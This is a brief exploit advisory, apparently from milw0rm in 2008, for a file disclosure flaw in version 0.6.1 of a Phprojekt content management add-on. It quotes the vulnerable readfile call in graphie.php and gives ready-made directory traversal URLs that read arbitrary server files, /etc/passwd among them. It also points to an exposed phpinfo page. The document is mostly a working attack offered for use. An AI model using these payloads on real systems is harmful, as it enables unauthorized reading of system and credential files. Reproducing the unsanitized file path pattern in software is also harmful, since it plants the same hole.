33 lines
1.1 KiB
Text
Executable file
33 lines
1.1 KiB
Text
Executable file
--------------------------------------------------------------------------------------------------------------
|
|
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
|
|
--------------------------------------------------------------------------------------------------------------
|
|
|
|
= Author : HouSSaMix
|
|
= Script : Content Management System for Phprojekt
|
|
= version : 0.6.1
|
|
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
|
|
|
|
|
|
= BUG : Remote File Disclosure Vulnerability
|
|
|
|
Vulnerable CODE :
|
|
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
|
|
readfile ($cm_imgpath . "/t.gif");
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
variable " $cm_imgpath " not declared
|
|
|
|
= Exploit :
|
|
|
|
target.com/cm/graphie.php?cm_imgpath=../.././../[file]
|
|
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd
|
|
|
|
= see phpinfo
|
|
target.com/cm/phpinfo.php
|
|
|
|
|
|
|
|
= greetz : V40 - marwen.neo and all muslims Hackers
|
|
|
|
=================================================================================================================
|
|
|
|
# milw0rm.com [2008-04-27]
|